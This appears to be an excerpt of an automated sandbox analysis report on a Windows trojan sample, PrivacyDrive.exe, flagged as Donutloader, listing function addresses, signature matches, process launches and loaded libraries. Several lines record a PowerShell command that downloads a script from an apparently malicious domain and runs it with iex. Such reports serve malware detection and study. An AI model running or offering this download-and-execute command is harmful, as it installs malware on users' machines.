    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F852924_2_00F85292
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FB83724_2_00FB8372
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FDD5C44_2_00FDD5C4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FAD6524_2_00FAD652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FB97924_2_00FB9792
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F898B24_2_00F898B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8E8024_2_00F8E802
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FAB99B4_2_00FAB99B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8CAE24_2_00F8CAE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8DA824_2_00F8DA82
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FB9A424_2_00FB9A42
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F83A084_2_00F83A08
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FA0B954_2_00FA0B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F82CB54_2_00F82CB5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FBFCA24_2_00FBFCA2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FC9DB24_2_00FC9DB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F82D5B4_2_00F82D5B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F86EFD4_2_00F86EFD
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8BEE24_2_00F8BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F86EB24_2_00F86EB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F88EB24_2_00F88EB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F82E8E4_2_00F82E8E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F82E1A4_2_00F82E1A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F82FB34_2_00F82FB3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8CF724_2_00F8CF72
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051AB5704_2_051AB570
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A15B14_2_051A15B1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A14184_2_051A1418
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A148C4_2_051A148C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A54B04_2_051A54B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A74B04_2_051A74B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A54FB4_2_051A54FB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051AA4E04_2_051AA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051B17C04_2_051B17C0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051D66E04_2_051D66E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051BF1934_2_051BF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A20064_2_051A2006
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051D80404_2_051D8040
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051AC0804_2_051AC080
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051AB0E04_2_051AB0E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A13594_2_051A1359
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051E83B04_2_051E83B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A12B34_2_051A12B3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051DE2A04_2_051DE2A0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051D7D904_2_051D7D90
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051CBC504_2_051CBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051C9F994_2_051C9F99
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051ACE004_2_051ACE00
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A7EB04_2_051A7EB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051D69704_2_051D6970
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051A38904_2_051A3890
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FCC5838_2_00FCC583
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7055F8_2_00F7055F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FA80E28_2_00FA80E2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F831C28_2_00F831C2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FBC2B28_2_00FBC2B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F752928_2_00F75292
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FA83728_2_00FA8372
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FCD5C48_2_00FCD5C4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F9D6528_2_00F9D652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FA97928_2_00FA9792
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F798B28_2_00F798B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7E8028_2_00F7E802
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F9B99B8_2_00F9B99B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7CAE28_2_00F7CAE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7DA828_2_00F7DA82
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FA9A428_2_00FA9A42
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F73A088_2_00F73A08
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F90B958_2_00F90B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F72CB58_2_00F72CB5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FAFCA28_2_00FAFCA2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FB9DB28_2_00FB9DB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F72D5B8_2_00F72D5B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F76EFD8_2_00F76EFD
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7BEE28_2_00F7BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F76EB28_2_00F76EB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F78EB28_2_00F78EB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F72E8E8_2_00F72E8E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F72E1A8_2_00F72E1A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F72FB38_2_00F72FB3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7CF728_2_00F7CF72
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011EF1938_2_011EF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D20068_2_011D2006
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_012080408_2_01208040
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011DC0808_2_011DC080
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011DB0E08_2_011DB0E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D13598_2_011D1359
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_012183B08_2_012183B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_0120E2A08_2_0120E2A0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D12B38_2_011D12B3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011DB5708_2_011DB570
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D15B18_2_011D15B1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D14188_2_011D1418
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D148C8_2_011D148C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D54B08_2_011D54B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D74B08_2_011D74B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D54FB8_2_011D54FB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011DA4E08_2_011DA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011E17C08_2_011E17C0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_012066E08_2_012066E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_012069708_2_01206970
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D38908_2_011D3890
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_0121A8B08_2_0121A8B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_01207D908_2_01207D90
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011FBC508_2_011FBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011F9F998_2_011F9F99
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011DCE008_2_011DCE00
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_011D7EB08_2_011D7EB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00424910 appears 45 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00418CF0 appears 92 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 004FFB7D appears 31 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00F80862 appears 145 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 011DEE60 appears 145 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00439540 appears 36 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 051ACBE0 appears 83 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00F7E5E2 appears 89 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00F8E5E2 appears 89 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 0041F120 appears 65 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 011DCBE0 appears 93 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00406E50 appears 178 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 051AEE60 appears 122 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 004C24A0 appears 135 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 0045EC80 appears 107 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 0052CF10 appears 37 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00407150 appears 69 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 0045EEC0 appears 42 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00F90862 appears 145 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 004FFB4F appears 47 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: String function: 00418AC0 appears 74 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
    Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
    Source: classification engineClassification label: mal100.troj.evad.win@13/30@4/3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004030E0 PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,GetLastError,FormatMessageW,LocalFree,4_2_004030E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004D3270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,4_2_004D3270
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0043E991 GetVolumeInformationW,GetDiskFreeSpaceExW,4_2_0043E991
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError,4_2_0041D320
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: CreateServiceW,ChangeServiceConfig2W,SetLastError,4_2_0041CE80
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F80C6F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,4_2_00F80C6F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051DF006 CoCreateInstance,4_2_051DF006
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004D3220 FindResourceW,SizeofResource,LoadResource,LockResource,4_2_004D3220
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041D320 OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError,4_2_0041D320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\OIlqJYuEJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2504
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess764
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anvhf53m.wns.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $textJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
